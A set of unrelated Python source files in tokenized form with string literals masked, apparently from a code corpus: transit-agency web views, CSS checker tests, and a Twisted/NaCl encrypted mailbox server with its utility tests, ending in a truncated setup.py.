. MEMCACHE_PAGE_SECONDS ) <EOL> def agencies ( request , countryslug = '<STR_LIT>' , stateslug = '<STR_LIT>' , cityslug = '<STR_LIT>' , nameslug = '<STR_LIT>' ) : <EOL> if nameslug : <EOL> urlslug = '<STR_LIT:/>' . join ( [ countryslug , stateslug , cityslug , nameslug ] ) <EOL> agency = Agency . all ( ) . filter ( '<STR_LIT>' , urlslug ) . get ( ) <EOL> feeds = FeedReference . all ( ) . filter ( '<STR_LIT>' , agency . gtfs_data_exchange_id ) <EOL> apps = TransitApp . iter_for_agency ( agency ) <EOL> template_vars = { <EOL> '<STR_LIT>' : agency , <EOL> '<STR_LIT>' : feeds , <EOL> '<STR_LIT>' : apps , <EOL> } <EOL> return render_to_response ( request , "<STR_LIT>" , template_vars ) <EOL> agency_list = Agency . fetch_for_slugs ( countryslug , stateslug , cityslug ) <EOL> if request . GET . get ( '<STR_LIT>' ) == '<STR_LIT>' : <EOL> jsonable_list = [ ] <EOL> for agency in agency_list : <EOL> jsonable_list . append ( agency . to_jsonable ( ) ) <EOL> return render_to_json ( jsonable_list ) <EOL> if request . GET . get ( '<STR_LIT>' ) == '<STR_LIT>' : <EOL> jsonable_list = [ ] <EOL> for agency in agency_list : <EOL> jsonable_list . append ( agency . to_jsonable ( ) ) <EOL> if len ( jsonable_list ) > <NUM_LIT:0> : <EOL> csv_buffer = StringIO ( ) <EOL> csv_writer = csv . writer ( csv_buffer ) <EOL> header = jsonable_list [ <NUM_LIT:0> ] . keys ( ) <EOL> csv_writer . writerow ( header ) <EOL> for item in jsonable_list : <EOL> csv_writer . writerow ( [ safe_str ( item [ header_col ] ) for header_col in header ] ) <EOL> return HttpResponse ( content = csv_buffer . getvalue ( ) , mimetype = "<STR_LIT>" ) <EOL> else : <EOL> return HttpResponse ( content = "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> public_filter = request . GET . get ( '<STR_LIT>' , '<STR_LIT:all>' ) <EOL> public_count = no_public_count = <NUM_LIT:0> <EOL> location = { '<STR_LIT>' : None , '<STR_LIT:state>' : None , '<STR_LIT>' : None } <EOL> if cityslug : <EOL> location [ '<STR_LIT>' ] = cityslug <EOL> if stateslug : <EOL> location [ '<STR_LIT:state>' ] = stateslug <EOL> if countryslug : <EOL> location [ '<STR_LIT>' ] = countryslug <EOL> location_string = cityslug or stateslug or countryslug <EOL> enhanced_list = [ ] ; <EOL> for a in agency_list : <EOL> if a . date_opened : <EOL> public_count += <NUM_LIT:1> <EOL> if public_filter == '<STR_LIT>' : <EOL> a . hide = True <EOL> else : <EOL> no_public_count += <NUM_LIT:1> <EOL> if public_filter == '<STR_LIT>' : <EOL> a . hide = True <EOL> enhanced_list . append ( a ) <EOL> if countryslug : <EOL> page_title = "<STR_LIT>" % location_string . upper ( ) ; <EOL> else : <EOL> page_title = "<STR_LIT>" <EOL> template_vars = { <EOL> '<STR_LIT>' : agency_list , <EOL> '<STR_LIT:location>' : location , <EOL> '<STR_LIT>' : location_string , <EOL> '<STR_LIT>' : public_count , <EOL> '<STR_LIT>' : public_filter , <EOL> '<STR_LIT>' : no_public_count , <EOL> '<STR_LIT>' : Agency . get_state_list ( ) , <EOL> '<STR_LIT>' : Agency . get_country_list ( ) , <EOL> '<STR_LIT>' : len ( agency_list ) , <EOL> '<STR_LIT>' : FeedReference . all_by_most_recent ( ) , <EOL> '<STR_LIT>' : users . is_current_user_admin ( ) , <EOL> '<STR_LIT>' : page_title , <EOL> '<STR_LIT>' : request . META [ '<STR_LIT>' ] + "<STR_LIT:?>" + request . META [ '<STR_LIT>' ] , <EOL> } <EOL> return render_to_response ( request , "<STR_LIT>" , template_vars ) <EOL> def generate_locations ( request ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def admin_agencies_list ( request ) : <EOL> matched_gtfs_data_exchange_ids = set ( ) <EOL> unmatched_agencies = set ( ) <EOL> unmatched_feeds = set ( ) <EOL> for agency in Agency . all ( ) : <EOL> if len ( agency . gtfs_data_exchange_id ) != <NUM_LIT:0> : <EOL> for gtfsdeid in agency . gtfs_data_exchange_id : <EOL> matched_gtfs_data_exchange_ids . add ( gtfsdeid ) <EOL> else : <EOL> unmatched_agencies . add ( agency ) <EOL> for feed in FeedReference . all ( ) : <EOL> if feed . gtfs_data_exchange_id not in matched_gtfs_data_exchange_ids : <EOL> unmatched_feeds . add ( feed ) <EOL> return render_to_response ( request , "<STR_LIT>" , { '<STR_LIT>' : Agency . all ( ) , '<STR_LIT>' : unmatched_feeds } ) <EOL> def admin_agencies_update_locations ( request ) : <EOL> agencies = [ agency for agency in Agency . all ( ) ] <EOL> for agency in agencies : <EOL> agency . update_location ( ) <EOL> for agencies_chunk in chunk_sequence ( agencies , <NUM_LIT:100> ) : <EOL> db . put ( agencies_chunk ) <EOL> return render_to_response ( request , "<STR_LIT>" ) <EOL> def delete_all_agencies ( request ) : <EOL> keys = [ key for key in Agency . all ( keys_only = True ) ] <EOL> for keys_chunk in chunk_sequence ( keys , <NUM_LIT:100> ) : <EOL> db . delete ( keys_chunk ) <EOL> return render_to_response ( request , "<STR_LIT>" ) <EOL> def delete_agency ( request , agency_id ) : <EOL> agency = Agency . get_by_id ( int ( agency_id ) ) <EOL> explicit_apps = TransitApp . fetch_for_explicit_agency ( agency ) <EOL> for explicit_app in explicit_apps : <EOL> explicit_app . remove_explicitly_supported_agency ( agency ) <EOL> for explicit_app_chunk in chunk_sequence ( explicit_apps , <NUM_LIT:10> ) : <EOL> db . put ( explicit_app_chunk ) <EOL> agency . delete ( ) <EOL> return redirect_to ( "<STR_LIT>" ) <EOL> def create_agency_from_feed ( request , feed_id ) : <EOL> feed = FeedReference . all ( ) . filter ( "<STR_LIT>" , feed_id ) . get ( ) <EOL> agency = Agency ( name = feed . name , <EOL> short_name = feed . name , <EOL> city = feed . area if feed . area != "<STR_LIT>" else "<STR_LIT>" , <EOL> state = feed . state if feed . state != "<STR_LIT>" else "<STR_LIT>" , <EOL> country = feed . country , <EOL> agency_url = feed . url , <EOL> gtfs_data_exchange_id = [ feed_id ] ) <EOL> agency . put ( ) <EOL> return redirect_to ( "<STR_LIT>" , agency_id = agency . key ( ) . id ( ) ) <EOL> def make_everything_public ( request ) : <EOL> """<STR_LIT>""" <EOL> things_an_agency_can_be = { } <EOL> n = int ( request . GET . get ( "<STR_LIT:n>" , <NUM_LIT:1000> ) ) <EOL> offset = int ( request . GET . get ( "<STR_LIT>" , <NUM_LIT:0> ) ) <EOL> i = <NUM_LIT:0> <EOL> count = <NUM_LIT:0> <EOL> for agency in Agency . all ( ) . fetch ( n , offset ) : <EOL> things_an_agency_can_be [ agency . private ] = things_an_agency_can_be . get ( agency . private , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> if agency . private != True : <EOL> agency . private = False <EOL> agency . put ( ) <EOL> i += <NUM_LIT:1> <EOL> count += <NUM_LIT:1> <EOL> all_public_count = Agency . all ( ) . filter ( "<STR_LIT>" , False ) . count ( ) <EOL> all_private_count = Agency . all ( ) . filter ( "<STR_LIT>" , True ) . count ( ) <EOL> all_all_count = Agency . all ( ) . count ( ) <EOL> return HttpResponse ( "<STR_LIT>" % ( n , offset , i , all_public_count , all_private_count , i , all_all_count , count , things_an_agency_can_be ) ) </s>
<s> from . TextReporter import TextReporter <EOL> from . JsonReporter import JsonReporter <EOL> from . XMLReporter import XMLReporter <EOL> class ReporterUtil ( ) : <EOL> @ staticmethod <EOL> def getReporter ( reporterType , checker ) : <EOL> if reporterType == '<STR_LIT:text>' : <EOL> return TextReporter ( checker ) <EOL> elif reporterType == '<STR_LIT>' : <EOL> return JsonReporter ( checker ) </s>
<s> from helper import * <EOL> def doTest ( ) : <EOL> _basic ( ) <EOL> _with_hack ( ) <EOL> _with_extra ( ) <EOL> _with_different_level ( ) <EOL> _with_css3_props ( ) <EOL> def _basic ( ) : <EOL> msg = doCssCompress ( '<STR_LIT>' ) <EOL> equal ( msg , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _with_hack ( ) : <EOL> msg = doCssCompress ( '<STR_LIT>' ) <EOL> equal ( msg , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _with_extra ( ) : <EOL> msg = doCssCompress ( '<STR_LIT>' ) <EOL> equal ( msg , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _with_different_level ( ) : <EOL> msg = doCssCompress ( '<STR_LIT>' ) <EOL> equal ( msg , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _with_css3_props ( ) : <EOL> msg = doCssCompress ( '<STR_LIT>' ) <EOL> equal ( msg , '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> from helper import * <EOL> def doTest ( ) : <EOL> fixer , msg = doFix ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> styleSheet = fixer . getStyleSheet ( ) <EOL> equal ( len ( styleSheet . getRuleSets ( ) ) , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> ruleSet = styleSheet . getRuleSets ( ) [ <NUM_LIT:0> ] <EOL> equal ( ruleSet . selector , '<STR_LIT>' , '<STR_LIT>' ) <EOL> width = ruleSet . getRuleByName ( '<STR_LIT:width>' ) <EOL> equal ( width . fixedValue , "<STR_LIT>" , '<STR_LIT>' ) <EOL> equal ( width . value , '<STR_LIT>' , '<STR_LIT>' ) <EOL> color = ruleSet . getRuleByName ( '<STR_LIT>' ) <EOL> equal ( color . fixedValue , '<STR_LIT>' , '<STR_LIT>' ) <EOL> equal ( color . value , '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> import os , struct , time , base64 <EOL> from twisted . application import service , internet <EOL> from twisted . web import server , resource , http <EOL> from nacl . public import PrivateKey , PublicKey , Box <EOL> from nacl . secret import SecretBox <EOL> from . . import rrid <EOL> from . . eventual import eventually <EOL> from . . util import remove_prefix , split_into , hex_or_none , unhex_or_none <EOL> from . . netstring import split_netstrings_and_trailer <EOL> from . . web import EventsProtocol <EOL> def parseMsgA ( msgA ) : <EOL> key_and_boxed = remove_prefix ( msgA , "<STR_LIT>" ) <EOL> pubkey1_s , boxed = split_into ( key_and_boxed , [ <NUM_LIT:32> ] , True ) <EOL> return pubkey1_s , boxed <EOL> def parseMsgB ( msgB ) : <EOL> ( MSTT , ) , msgC = split_netstrings_and_trailer ( msgB ) <EOL> return MSTT , msgC <EOL> class ServerResource ( resource . Resource ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message_handler ) : <EOL> resource . Resource . __init__ ( self ) <EOL> self . message_handler = message_handler <EOL> def render_POST ( self , request ) : <EOL> msgA = request . content . read ( ) <EOL> self . message_handler ( msgA ) <EOL> return "<STR_LIT>" <EOL> class BaseServer ( service . MultiService ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> service . MultiService . __init__ ( self ) <EOL> class HTTPMailboxServer ( BaseServer ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , db , web , baseurl , desc ) : <EOL> BaseServer . __init__ ( self ) <EOL> self . db = db <EOL> assert baseurl . endswith ( "<STR_LIT:/>" ) <EOL> self . baseurl = baseurl <EOL> self . transport_privkey = PrivateKey ( desc [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) ) <EOL> self . TT_privkey = desc [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) <EOL> self . TT_pubkey = desc [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) <EOL> self . retrieval_privkey = PrivateKey ( desc [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) ) <EOL> web . get_root ( ) . putChild ( "<STR_LIT>" , ServerResource ( self . handle_msgA ) ) <EOL> r = resource . Resource ( ) <EOL> self . listres = RetrievalListResource ( self . db , self . retrieval_privkey ) <EOL> r . putChild ( "<STR_LIT:list>" , self . listres ) <EOL> ts = internet . TimerService ( self . listres . CLOCK_WINDOW * <NUM_LIT:3> , <EOL> self . prune_old_requests ) <EOL> ts . setServiceParent ( self ) <EOL> r . putChild ( "<STR_LIT>" , RetrievalFetchResource ( self . db ) ) <EOL> r . putChild ( "<STR_LIT>" , RetrievalDeleteResource ( self . db ) ) <EOL> web . get_root ( ) . putChild ( "<STR_LIT>" , r ) <EOL> def allocate_transport ( self , remote = True ) : <EOL> symkey = None <EOL> if remote : <EOL> symkey = os . urandom ( <NUM_LIT:32> ) <EOL> RT = os . urandom ( <NUM_LIT:8> ) <EOL> TTID , TT0 = rrid . create_token ( self . TT_pubkey ) <EOL> return self . add_transport ( TTID , TT0 , RT , symkey ) <EOL> def add_transport ( self , TTID , TT0 , RT , symkey ) : <EOL> tid = self . db . insert ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ( TTID . encode ( "<STR_LIT>" ) , TT0 . encode ( "<STR_LIT>" ) , <EOL> hex_or_none ( RT ) , hex_or_none ( symkey ) ) , <EOL> "<STR_LIT>" ) <EOL> self . db . commit ( ) <EOL> return tid <EOL> def get_local_transport ( self ) : <EOL> row = self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . fetchone ( ) <EOL> if not row : <EOL> return self . allocate_transport ( False ) <EOL> return row [ "<STR_LIT:id>" ] <EOL> def get_tid_data ( self , tid ) : <EOL> c = self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , ( tid , ) ) <EOL> row = c . fetchone ( ) <EOL> return ( row [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) , row [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) , <EOL> unhex_or_none ( row [ "<STR_LIT>" ] ) , unhex_or_none ( row [ "<STR_LIT>" ] ) ) <EOL> def get_mailbox_record ( self , tid ) : <EOL> ( TTID , TT0 , RT , symkey ) = self . get_tid_data ( tid ) <EOL> if symkey : <EOL> rpubkey = self . retrieval_privkey . public_key . encode ( ) <EOL> retrieval = { "<STR_LIT:type>" : "<STR_LIT:http>" , <EOL> "<STR_LIT>" : self . baseurl + "<STR_LIT>" , <EOL> "<STR_LIT>" : rpubkey . encode ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : RT . encode ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : symkey . encode ( "<STR_LIT>" ) , <EOL> } <EOL> else : <EOL> retrieval = { "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : RT . encode ( "<STR_LIT>" ) } <EOL> tpubkey = self . transport_privkey . public_key . encode ( ) <EOL> transport_generic = { "<STR_LIT:type>" : "<STR_LIT:http>" , <EOL> "<STR_LIT:url>" : self . baseurl + "<STR_LIT>" , <EOL> "<STR_LIT>" : tpubkey . encode ( "<STR_LIT>" ) <EOL> } <EOL> transport_sender = { "<STR_LIT>" : TT0 . encode ( "<STR_LIT>" ) } <EOL> return { "<STR_LIT>" : retrieval , <EOL> "<STR_LIT>" : { "<STR_LIT>" : transport_generic , <EOL> "<STR_LIT>" : transport_sender } } <EOL> def prune_old_requests ( self ) : <EOL> self . listres . prune_old_requests ( ) <EOL> def register_local_transport_handler ( self , handler ) : <EOL> self . local_transport_handler = handler <EOL> def handle_msgA ( self , msgA ) : <EOL> pubkey1_s , boxed = parseMsgA ( msgA ) <EOL> msgB = Box ( self . transport_privkey , PublicKey ( pubkey1_s ) ) . decrypt ( boxed ) <EOL> eventually ( self . handle_msgB , msgB ) <EOL> def handle_msgB ( self , msgB ) : <EOL> MSTT , msgC = parseMsgB ( msgB ) <EOL> TTID = rrid . decrypt ( self . TT_privkey , MSTT ) <EOL> c = self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , ( TTID . encode ( "<STR_LIT>" ) , ) ) <EOL> row = c . fetchone ( ) <EOL> if row : <EOL> if row [ "<STR_LIT>" ] is None : <EOL> return self . local_transport_handler ( msgC ) <EOL> else : <EOL> return self . queue_msgC ( row [ "<STR_LIT:id>" ] , msgC ) <EOL> self . signal_unrecognized_TTID ( TTID ) <EOL> def queue_msgC ( self , tid , msgC ) : <EOL> self . db . insert ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ( tid , len ( msgC ) , msgC . encode ( "<STR_LIT>" ) ) , <EOL> "<STR_LIT>" ) <EOL> self . db . commit ( ) <EOL> def signal_unrecognized_TTID ( self , TTID ) : <EOL> raise KeyError ( "<STR_LIT>" ) <EOL> def decrypt_list_request_1 ( req ) : <EOL> tmppub , boxed0 = req [ : <NUM_LIT:32> ] , req [ <NUM_LIT:32> : ] <EOL> return tmppub , boxed0 <EOL> def decrypt_list_request_2 ( tmppub , boxed0 , retrieval_privkey ) : <EOL> nonce = "<STR_LIT:\x00>" * <NUM_LIT> <EOL> m = Box ( retrieval_privkey , PublicKey ( tmppub ) ) . decrypt ( boxed0 , nonce ) <EOL> timestamp , RT = struct . unpack ( "<STR_LIT>" , m ) <EOL> return timestamp , RT <EOL> assert struct . calcsize ( "<STR_LIT>" ) == <NUM_LIT:8> <EOL> def create_list_entry ( symkey , tmppub , length , <EOL> nonce = None , fetch_token = None , delete_token = None ) : <EOL> assert len ( tmppub ) == <NUM_LIT:32> <EOL> fetch_token = fetch_token or os . urandom ( <NUM_LIT:32> ) <EOL> delete_token = delete_token or os . urandom ( <NUM_LIT:32> ) <EOL> msg = "<STR_LIT>" + struct . pack ( "<STR_LIT>" , <EOL> tmppub , fetch_token , delete_token , length ) <EOL> nonce = nonce or os . urandom ( <NUM_LIT> ) <EOL> sbox = SecretBox ( symkey ) <EOL> return sbox . encrypt ( msg , nonce ) , fetch_token , delete_token <EOL> def encrypt_fetch_response ( symkey , fetch_token , msgC , nonce = None ) : <EOL> assert len ( fetch_token ) == <NUM_LIT:32> <EOL> msg = "<STR_LIT>" + fetch_token + msgC <EOL> nonce = nonce or os . urandom ( <NUM_LIT> ) <EOL> return SecretBox ( symkey ) . encrypt ( msg , nonce ) <EOL> class RetrievalListResource ( resource . Resource ) : <EOL> CLOCK_WINDOW = <NUM_LIT:5> * <NUM_LIT> <EOL> MAX_MESSAGES_PER_ENTRY = <NUM_LIT:10> <EOL> ENABLE_EVENTSOURCE = True <EOL> def __init__ ( self , db , retrieval_privkey ) : <EOL> resource . Resource . __init__ ( self ) <EOL> self . db = db <EOL> self . retrieval_privkey = retrieval_privkey <EOL> self . old_requests = { } <EOL> self . db . subscribe ( "<STR_LIT>" , self . new_message ) <EOL> self . subscribers = { } <EOL> def new_message ( self , notice ) : <EOL> if notice . action != "<STR_LIT>" : <EOL> return <EOL> v = notice . new_value <EOL> if v [ "<STR_LIT>" ] not in self . subscribers : <EOL> return <EOL> ( p , symkey , tmppub ) = self . subscribers [ v [ "<STR_LIT>" ] ] <EOL> entry = self . prepare_entry ( symkey , tmppub , v ) <EOL> p . sendEvent ( base64 . b64encode ( entry ) ) <EOL> def prune_old_requests ( self , now = None ) : <EOL> old = ( now or time . time ( ) ) - self . CLOCK_WINDOW <EOL> old_tmppubs = [ ] <EOL> for tmppub , ts in self . old_requests . items ( ) : <EOL> if ts < old : <EOL> old_tmppubs . append ( tmppub ) <EOL> for tmppub in old_tmppubs : <EOL> del self . old_requests [ tmppub ] <EOL> def render_GET ( self , request ) : <EOL> msg = base64 . urlsafe_b64decode ( request . args [ "<STR_LIT:t>" ] [ <NUM_LIT:0> ] ) <EOL> tmppub , boxed0 = decrypt_list_request_1 ( msg ) <EOL> if tmppub in self . old_requests : <EOL> request . setResponseCode ( http . BAD_REQUEST , "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> ts , RT = decrypt_list_request_2 ( tmppub , boxed0 , self . retrieval_privkey ) <EOL> now = time . time ( ) <EOL> if ts < now - self . CLOCK_WINDOW or ts > now + self . CLOCK_WINDOW : <EOL> request . setResponseCode ( http . BAD_REQUEST , "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> try : <EOL> tid , symkey = self . check_RT ( RT ) <EOL> except KeyError : <EOL> request . setResponseCode ( http . NOT_FOUND , "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> self . old_requests [ tmppub ] = ts <EOL> all_messages = self . prepare_message_list ( tid , symkey , tmppub ) <EOL> groups = [ all_messages [ i : i + self . MAX_MESSAGES_PER_ENTRY ] <EOL> for i in range ( <NUM_LIT:0> , len ( all_messages ) , <EOL> self . MAX_MESSAGES_PER_ENTRY ) ] <EOL> entries = [ "<STR_LIT:U+0020>" . join ( [ base64 . b64encode ( e ) for e in group ] ) <EOL> for group in groups ] <EOL> if ( "<STR_LIT>" in ( request . getHeader ( "<STR_LIT>" ) or "<STR_LIT>" ) <EOL> and self . ENABLE_EVENTSOURCE ) : <EOL> if tid in self . subscribers : <EOL> self . subscribers [ tid ] [ <NUM_LIT:0> ] . stop ( ) <EOL> request . setHeader ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> p = EventsProtocol ( request ) <EOL> p . sendComment ( "<STR_LIT>" ) <EOL> for e in entries : <EOL> p . sendEvent ( e ) <EOL> self . subscribers [ tid ] = ( p , symkey , tmppub ) <EOL> def _done ( _ ) : <EOL> if tid in self . subscribers and self . subscribers [ tid ] [ <NUM_LIT:0> ] is p : <EOL> del self . subscribers [ tid ] <EOL> request . notifyFinish ( ) . addErrback ( _done ) <EOL> return server . NOT_DONE_YET <EOL> for e in entries : <EOL> request . write ( "<STR_LIT>" % e ) <EOL> return "<STR_LIT>" <EOL> def check_RT ( self , RT ) : <EOL> c = self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , ( RT . encode ( "<STR_LIT>" ) , ) ) <EOL> row = c . fetchone ( ) <EOL> if row : <EOL> return ( row [ "<STR_LIT:id>" ] , row [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) ) <EOL> raise KeyError ( "<STR_LIT>" ) <EOL> def prepare_message_list ( self , tid , symkey , tmppub ) : <EOL> entries = [ ] <EOL> c = self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , ( tid , ) ) <EOL> for row in c . fetchall ( ) : <EOL> entry = self . prepare_entry ( symkey , tmppub , row ) <EOL> entries . append ( entry ) <EOL> self . db . commit ( ) <EOL> return entries <EOL> def prepare_entry ( self , symkey , tmppub , c ) : <EOL> entry , fetch_token , delete_token = create_list_entry ( symkey , tmppub , <EOL> c [ "<STR_LIT>" ] ) <EOL> self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ( fetch_token . encode ( "<STR_LIT>" ) , <EOL> delete_token . encode ( "<STR_LIT>" ) , <EOL> c [ "<STR_LIT:id>" ] ) ) <EOL> return entry <EOL> class RetrievalFetchResource ( resource . Resource ) : <EOL> def __init__ ( self , db ) : <EOL> resource . Resource . __init__ ( self ) <EOL> self . db = db <EOL> def render_GET ( self , request ) : <EOL> fetch_token = base64 . urlsafe_b64decode ( request . args [ "<STR_LIT:t>" ] [ <NUM_LIT:0> ] ) <EOL> c = self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ( fetch_token . encode ( "<STR_LIT>" ) , ) ) <EOL> row = c . fetchone ( ) <EOL> if row : <EOL> c2 = self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , ( row [ "<STR_LIT>" ] , ) ) <EOL> symkey = c2 . fetchone ( ) [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) <EOL> self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ( row [ "<STR_LIT:id>" ] , ) ) <EOL> self . db . commit ( ) <EOL> resp = encrypt_fetch_response ( symkey , fetch_token , <EOL> row [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) ) <EOL> return resp <EOL> request . setResponseCode ( http . NOT_FOUND , "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> class RetrievalDeleteResource ( resource . Resource ) : <EOL> def __init__ ( self , db ) : <EOL> resource . Resource . __init__ ( self ) <EOL> self . db = db <EOL> def render_POST ( self , request ) : <EOL> delete_token = base64 . urlsafe_b64decode ( request . args [ "<STR_LIT:t>" ] [ <NUM_LIT:0> ] ) <EOL> self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ( delete_token . encode ( "<STR_LIT>" ) , ) ) <EOL> self . db . commit ( ) <EOL> request . setResponseCode ( http . OK , "<STR_LIT>" ) <EOL> return "<STR_LIT>" </s>
<s> from twisted . trial import unittest <EOL> from twisted . internet import tcp , protocol <EOL> from nacl . signing import SigningKey <EOL> from nacl . exceptions import CryptoError <EOL> from . . import util , errors <EOL> class Utils ( unittest . TestCase ) : <EOL> def test_split_into ( self ) : <EOL> self . failUnlessEqual ( util . split_into ( "<STR_LIT>" , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) , <EOL> [ "<STR_LIT:A>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . failUnlessEqual ( util . split_into ( "<STR_LIT>" , [ <NUM_LIT:2> , <NUM_LIT:1> ] , True ) , <EOL> [ "<STR_LIT>" , "<STR_LIT:B>" , "<STR_LIT>" ] ) <EOL> self . failUnlessRaises ( ValueError , <EOL> util . split_into , "<STR_LIT>" , [ <NUM_LIT:2> , <NUM_LIT:1> ] , False ) <EOL> self . failUnlessRaises ( ValueError , <EOL> util . split_into , "<STR_LIT>" , [ <NUM_LIT:2> , <NUM_LIT:1> ] <EOL> ) <EOL> def test_ascii ( self ) : <EOL> b2a = util . to_ascii <EOL> a2b = util . from_ascii <EOL> for prefix in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> for length in range ( <NUM_LIT:0> , <NUM_LIT:100> ) : <EOL> b1 = "<STR_LIT:a>" * length <EOL> for base in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> a = b2a ( b1 , prefix , base ) <EOL> b2 = a2b ( a , prefix , base ) <EOL> self . failUnlessEqual ( b1 , b2 ) <EOL> self . failUnlessRaises ( NotImplementedError , b2a , "<STR_LIT:a>" , encoding = "<STR_LIT:none>" ) <EOL> self . failUnlessRaises ( NotImplementedError , a2b , "<STR_LIT:a>" , encoding = "<STR_LIT:none>" ) <EOL> def test_nonce ( self ) : <EOL> n1 = util . make_nonce ( ) <EOL> self . failUnlessEqual ( len ( n1 ) , <NUM_LIT> ) <EOL> n2 = util . make_nonce ( ) <EOL> self . failIfEqual ( n1 , n2 ) <EOL> def test_equal ( self ) : <EOL> self . failUnless ( util . equal ( "<STR_LIT:a>" , "<STR_LIT:a>" ) ) <EOL> self . failIf ( util . equal ( "<STR_LIT:a>" , "<STR_LIT:b>" ) ) <EOL> def test_x_or_none ( self ) : <EOL> self . failUnlessEqual ( util . hex_or_none ( None ) , None ) <EOL> self . failUnlessEqual ( util . hex_or_none ( "<STR_LIT:A>" ) , "<STR_LIT>" ) <EOL> self . failUnlessEqual ( util . unhex_or_none ( None ) , None ) <EOL> self . failUnlessEqual ( util . unhex_or_none ( "<STR_LIT>" ) , "<STR_LIT:B>" ) <EOL> def test_remove_prefix ( self ) : <EOL> self . failUnlessEqual ( util . remove_prefix ( "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> x = self . failUnlessRaises ( util . BadPrefixError , <EOL> util . remove_prefix , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . failUnlessEqual ( str ( x ) , "<STR_LIT>" ) <EOL> x = self . failUnlessRaises ( ValueError , <EOL> util . remove_prefix , "<STR_LIT>" , "<STR_LIT>" , <EOL> ValueError ) <EOL> self . failUnlessEqual ( str ( x ) , "<STR_LIT>" ) <EOL> class Signatures ( unittest . TestCase ) : <EOL> def test_verify_with_prefix ( self ) : <EOL> sk = SigningKey . generate ( ) <EOL> vk = sk . verify_key <EOL> m = "<STR_LIT:body>" <EOL> prefix = "<STR_LIT>" <EOL> sk2 = SigningKey . generate ( ) <EOL> sm1 = sk . sign ( prefix + m ) <EOL> sm2 = sk . sign ( "<STR_LIT>" + m ) <EOL> sm3 = sk2 . sign ( prefix + m ) <EOL> self . failUnlessEqual ( util . verify_with_prefix ( vk , sm1 , prefix ) , m ) <EOL> self . failUnlessRaises ( errors . BadSignatureError , <EOL> util . verify_with_prefix , vk , sm2 , prefix ) <EOL> self . failUnlessRaises ( CryptoError , <EOL> util . verify_with_prefix , vk , sm3 , prefix ) <EOL> class AllocatePort ( unittest . TestCase ) : <EOL> def test_allocate ( self ) : <EOL> port = util . allocate_port ( ) <EOL> p2 = tcp . Port ( port , protocol . Factory ( ) ) <EOL> p2 . startListening ( ) <EOL> port2 = p2 . getHost ( ) . port <EOL> d = p2 . stopListening ( ) <EOL> def _stopped ( res ) : <EOL> self . failUnlessEqual ( port , port2 ) <EOL> return res <EOL> d . addBoth ( _stopped ) <EOL> return d </s>
<s> import os , tempfile <EOL> from setuptools import setup <EOL> from distutils . command . build_scripts import build_scripts <EOL> import versioneer <EOL> commands = versioneer . get_cmdclass ( ) . copy ( ) <EOL> class my_build_scripts ( build_scripts ) : <EOL> def run ( self ) : <EOL> versions = versioneer . get_versions ( ) <EOL> tempdir = tempfile . mkdtemp ( ) <EOL> generated = os . path . join ( tempdir , "<STR_LIT>" ) <EOL> with open ( generated , "<STR_LIT:wb>" ) as f : <EOL> for line in open ( "<STR_LIT>" , "<STR_LIT:rb>" ) : <EOL> if line . strip ( ) . decode ( "<STR_LIT:ascii>" ) == "<STR_LIT>" : <EOL> f . write ( ( '<STR_LIT>' % ( versions , ) ) . encode ( "<STR_LIT:ascii>" ) ) <EOL> else : <EOL> f . write ( line ) <EOL> self . scripts = [ generated ] <EOL> rc = build_scripts . run ( self ) <EOL> os . unlink ( generated ) <EOL> os . rmdir ( tempdir ) <EOL> return rc <EOL> commands [ "<STR_LIT>" ] = my_build_scripts <EOL> setup ( name = "<STR_LIT>" , <EOL> version = versioneer . get_version ( ) , <EOL> description = "<STR_LIT>" , <EOL> url = 